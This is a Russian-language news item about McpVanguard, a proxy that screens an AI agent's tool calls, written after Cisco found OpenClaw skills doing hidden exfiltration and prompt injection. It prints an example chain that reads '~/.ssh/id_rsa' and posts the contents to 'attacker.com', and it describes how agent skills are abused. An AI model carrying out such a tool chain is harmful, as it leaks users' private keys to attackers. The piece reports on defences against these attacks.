Прокси-сервер McpVanguard блокирует эксфильтрацию данных навыка OpenClaw

В ответ на обнаружение командой безопасности ИИ Cisco сторонних навыков OpenClaw, выполняющих скрытую утечку данных и инъекцию промптов, разработчик выпустил McpVanguard — прокси, предназначенный для размещения между ИИ-агентом и его инструментами, чтобы блокировать вредоносные вызовы до их выполнения.
Проблема: Цепочки вредоносных вызовов
Проблема безопасности заключается не в ошибке самого OpenClaw, а в последствиях предоставления агентам доступа к файловой системе, выполнения команд оболочки и сетевых вызовов без границ принуждения. Тестирование Cisco выявило схему, когда, казалось бы, безобидные отдельные вызовы объединяются для создания утечки, например:
read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)Ни один из вызовов по отдельности не выглядит вредоносным, но вместе они приводят к утечке конфиденциальных данных. Согласно источнику, на пике в ClawHub было более 820 вредоносных навыков, а уязвимость CVE-2026-25253 позволяла злоумышленникам добиться удалённого выполнения кода через одну вредоносную ссылку. Текущая проверка на уровне навыков не позволяет обнаружить такие цепочки вызовов.
Решение: Прокси McpVanguard
McpVanguard решает эту проблему, перехватывая вызовы между агентом и его инструментами. Он использует три метода обнаружения:
- Сопоставление с образцом
- Оценка семантического намерения
- Обнаружение поведенческих цепочек за всю сессию
Установка осуществляется через pip: pip install mcp-vanguard.
Более глубокий слой: Протокол VEX
Проект включает более глубокий слой безопасности под названием VEX Protocol, описанный как система «бортового самописца». Он предоставляет:
- Аудит-трейлы Меркла для журналирования с защитой от несанкционированного изменения
- Верификацию идентичности агента, основанную на TPM
- Принуждение на уровне системных вызовов
Протокол VEX написан на Rust, и его разработка началась в декабре 2023 года, до того как OpenClaw получил широкую популярность. В источнике отмечается, что NVIDIA недавно выпустила NemoClaw для аналогичных целей безопасности, что указывает на то, что угрозы такого типа никуда не исчезнут.
Оба проекта доступны на GitHub:
📖 Read the full source: r/openclaw
👀 Смотрите также

"Живой дашборд открытых инструментов OpenClaw"
Эта запись выделяет живую панель управления, демонстрирующую открытые панельные управления для инструментов OpenClaw, таких как Moltbot и Clawdbot.

Проблемы безопасности OpenClaw: ключи API и данные переписки под угрозой при стандартной самостоятельной хостинге
Отчёт Cisco указывает, что безопасность OpenClaw является «опциональной, а не встроенной», при этом конфигурации по умолчанию хранят API-ключи в файлах .env на VPS-инстансах, что создаёт потенциальную угрозу для нетехнических пользователей, работающих на базовых дроплетах.

Сообщается, что исходный код Claude Code был утечен через карту файлов NPM.
Твит сообщает, что исходный код Claude Code был утечен через файл карты в их реестре NPM. Обсуждение на HN набрало 93 балла и 35 комментариев.

Защитные механизмы ИИ-агентов со временем ослабляются без активного обслуживания.
Защитные механизмы ИИ-агентов со временем деградируют по мере накопления обновлений системных промптов, изменения версий моделей и добавления новых инструментов, что часто приводит к противоречивым или игнорируемым правилам безопасности, требующим регулярной проверки и тестирования.